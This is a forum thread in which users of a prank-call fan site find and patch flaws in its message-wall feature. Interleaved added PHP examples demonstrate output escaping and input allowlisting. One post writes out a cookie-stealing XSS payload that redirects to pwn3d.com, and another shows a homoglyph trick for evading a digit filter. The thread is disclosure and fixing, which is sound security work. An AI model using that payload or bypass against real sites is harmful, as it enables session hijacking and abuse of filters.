PLA Forums

OMG IT'S TEH PLA! => All Things PLA => Topic started by: Godot on February 04, 2007, 06:43:31 PM

Title: Fruit Wall
Post by: Godot on February 04, 2007, 06:43:31 PM
What happened to the FruitWall?
Title: Re: Fruit Wall
Post by: gangals on February 04, 2007, 07:21:08 PM
If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html
Title: Re: Fruit Wall
Post by: Raptor on February 04, 2007, 07:23:33 PM
> If you look at the logs, someone from 149.9.0.57 has been abusing the wall.
>
> http://phonelosers.org/php/fruitwall_log.html

Damn, it's a good thing that message didn't end up getting displayed!
Title: Re: Fruit Wall
Post by: rbcp on February 04, 2007, 08:14:12 PM
It was displayed last night. That's when I took it down. There's a simple line I can add to the Perl code of FruitWall to make that not happen anymore, but I've been lazy about it these past couple of years. Once I get around to fixing it, I'll put it back up.
Title: Re: Fruit Wall
Post by: Godot on February 05, 2007, 03:09:49 PM
Oh, okay. I knew about the bug, but I didn't realize it was being used for abuse. I did post a few messages a while back that were slightly too long, taunting people to try and repost them, just to have some fun, but I did not do anything as extreme as that guy.
Title: Re: Fruit Wall
Post by: Godot on February 11, 2007, 07:42:15 PM
I just took a look at the FruitWall Perl code. You should be able to fix it by changing the line that reads
Code:
if ($ENV{'HTTP_REFERER'} =~ "$wallpage") {
to
Code:
if ( ($ENV{'HTTP_REFERER'} =~ "$wallpage") && (length($lalalala) <= 75) ) {
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:00:50 PM
Today I finally wrote a PHP version of FruitWall and put it up on the main page. Go look, try it out, and please post here if you find a way to hax0r me. As of now, the "color" and "link" options don't do anything, but I'm going to make those work soon. I think I've made it so HTML can't be posted into the form, but we'll see. I've also banned most numbers since people love posting phone numbers on it.
Title: Re: Fruit Wall
Post by: Godot on February 28, 2009, 12:07:05 PM
Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:08:56 PM
> Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.

Thanks, I'm working on that now. And I DID put it in the Perl code on the old one after a few years of just having it in the form.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:27:20 PM
Got the length problem fixed.  Only 80 characters are allowed now.

Next problem?
Title: Re: Fruit Wall
Post by: Godot on February 28, 2009, 01:35:37 PM
> Next problem?

If a user is dumb enough to listen to somebody else who tells him to try to post a certain message to the Fruit Wall, that user could get his cookies stolen, which possibly could give the attacker access to his account.

The victim would be told to enter something like
Code:
<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script>
which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 02:25:42 PM
> The victim would be told to enter something like
> Code:
> <script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script>
> which would send his cookies to whoever runs pwn3d.com.
>
> To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.

Thanks for the tip.  I just made it so it doesn't display what they're not allowed to type anymore.

Also, I decided to take away the ability to post colors or a link.  I had those parts working, but with the link I couldn't figure out a good way to post both the link to change the message and the submitted link.  And colors were just pointless.  I've got it all logging everything with IP addresses now too.
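The bug Godot describes and the two fixes discussed in this exchange, as an added example. This is a hypothetical reconstruction of a FruitWall-style submit handler, not the phonelosers.org code; every function and variable name here is an assumption. It also enforces the 80-character cap in PHP rather than only through the form's maxlength, which is the point Godot made earlier in the thread. Requires the mbstring extension.

```php
<?php
// Added example, not the phonelosers.org FruitWall source: a hypothetical
// reconstruction of a submit handler with the server-side rules the thread
// settles on (length cap, no HTML, no digits), the reflected-XSS error path
// Godot describes, and the two ways to close it. All names are assumptions.

declare(strict_types=1);

const MAX_LEN = 80;   // the limit rbcp set; enforced here, not only via maxlength in the form

// Returns null if $msg may be posted, otherwise a short reason for refusal.
function reject_reason(string $msg): ?string {
    if (mb_strlen($msg, 'UTF-8') > MAX_LEN) {   // count characters, not bytes
        return 'too long';
    }
    if (preg_match('/[<>]/', $msg) === 1) {     // crude HTML ban, as in the thread
        return 'html';
    }
    if (preg_match('/[0-9]/', $msg) === 1) {    // digit ban against phone numbers
        return 'numbers';
    }
    return null;
}

// VULNERABLE: the refused text is interpolated into HTML unescaped. Since the
// HTML ban is exactly what routes input here, whatever tags the user typed are
// reflected verbatim, and <script>...</script> executes in that user's browser.
function error_html_vulnerable(string $forbidden_text): string {
    return "<p>OMG WTF, you can't type $forbidden_text here!</p>";
}

// FIXED (Godot's suggestion): encode for an HTML text-node context.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE keeps invalid
// UTF-8 from silently turning the whole message into an empty string.
function error_html_fixed(string $forbidden_text): string {
    $safe = htmlspecialchars($forbidden_text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>OMG WTF, you can't type $safe here!</p>";
}

// FIXED (what rbcp did instead): never reflect the input at all.
function error_html_silent(): string {
    return "<p>OMG WTF, you can't type that here!</p>";
}

// Constructed input: the payload from Godot's post, as a user might paste it.
$payload = '<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script>';

echo 'reject reason: ', reject_reason($payload) ?? 'none', "\n";
echo 'vulnerable:    ', error_html_vulnerable($payload), "\n";
echo 'fixed:         ', error_html_fixed($payload), "\n";
echo 'silent:        ', error_html_silent(), "\n";
```

Run it with `php` from the command line: the payload is 79 characters, so it clears the length check and is refused by the HTML rule, which is what makes the vulnerable error path reflect a live script tag. Escaping at output time works for any text-node reflection; not reflecting at all is simpler but loses the feedback to the user.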
Title: Re: Fruit Wall
Post by: Magus on February 28, 2009, 10:59:02 PM
Check the fruitwall --
I typed this and it worked:

OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

You might want to ban most characters besides A-Z, underscores, hyphens, etc.
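Why Magus's post gets through a digit ban, and the allowlist he suggests, as an added example. This is not FruitWall code; the inputs are constructed and the function names are mine. The homoglyph sample is the string from Magus's post, in which the o, e and s are Greek and Cyrillic look-alikes rather than ASCII letters.

```php
<?php
// Added example, not FruitWall code: why Magus's post slips past a digit
// blocklist and how the allowlist he suggests handles it. The inputs below are
// constructed; function names are my own.

declare(strict_types=1);

// The blocklist as rbcp described it: refuse ASCII digits only.
function passes_ascii_digit_ban(string $msg): bool {
    return preg_match('/[0-9]/', $msg) === 0;
}

// A stricter blocklist: refuse any Unicode decimal digit. Needs the /u flag so
// PCRE treats the input as UTF-8. Still says nothing about look-alike letters.
function passes_unicode_digit_ban(string $msg): bool {
    return preg_match('/\p{Nd}/u', $msg) === 0;
}

// Allowlist: 1 to 80 characters drawn from a fixed printable-ASCII set. Any
// byte outside the class, including every byte of a multibyte UTF-8 sequence,
// fails the match, so homoglyphs are refused without enumerating them. \z
// rather than $ so a trailing newline cannot ride along.
function passes_allowlist(string $msg): bool {
    return preg_match('/^[A-Za-z _\-.,!?\'"]{1,80}\z/', $msg) === 1;
}

// Constructed samples.
$samples = [
    'plain text'         => 'hello world',
    'ascii phone number' => 'call 555-0100',
    'fullwidth digits'   => 'call ５５５-０１００',   // U+FF15 etc., still category Nd
    'magus homoglyphs'   => 'OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn',
    'digits as words'    => 'five five five',
];

printf("%-20s %-10s %-12s %-9s\n", 'input', 'ascii-ban', 'unicode-ban', 'allowlist');
foreach ($samples as $label => $msg) {
    printf("%-20s %-10s %-12s %-9s\n",
        $label,
        passes_ascii_digit_ban($msg)   ? 'passes' : 'refused',
        passes_unicode_digit_ban($msg) ? 'passes' : 'refused',
        passes_allowlist($msg)         ? 'passes' : 'refused');
}
```

The ASCII digit ban lets both the fullwidth digits and the homoglyph line through; the Unicode digit ban catches the fullwidth digits but not the look-alike letters; only the allowlist refuses both while still accepting a phone number spelled out in words. If a blocklist has to stay, normalizing input to NFKC first folds fullwidth digits to ASCII, but nothing short of a confusables table maps Greek omicron to Latin o, which is why an allowlist is the cheaper defence here.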
Title: Re: Fruit Wall
Post by: rbcp on March 01, 2009, 07:46:55 AM
> Check the fruitwall --
> I typed this and it worked:
>
> OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that? Are you using those crazy ASCII codes or something?
Title: Re: Fruit Wall
Post by: Magus on March 01, 2009, 10:38:04 AM
>> Check the fruitwall --
>> I typed this and it worked:
>>
>> OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn
>
> How'd you do that? Are you using those crazy ASCII codes or something?

ASCII = Yes.
It would seem that I'm also 31773 like you hacker folks.
Title: Re: Fruit Wall
Post by: rbcp on March 01, 2009, 12:35:02 PM
> ASCII = Yes.

Guess I'll just leave that hole open.  Most of the people who post phone numbers hopefully won't know how to use leet methods like this.
Title: Re: Fruit Wall
Post by: linear on March 01, 2009, 01:16:02 PM
you lazy piece of shit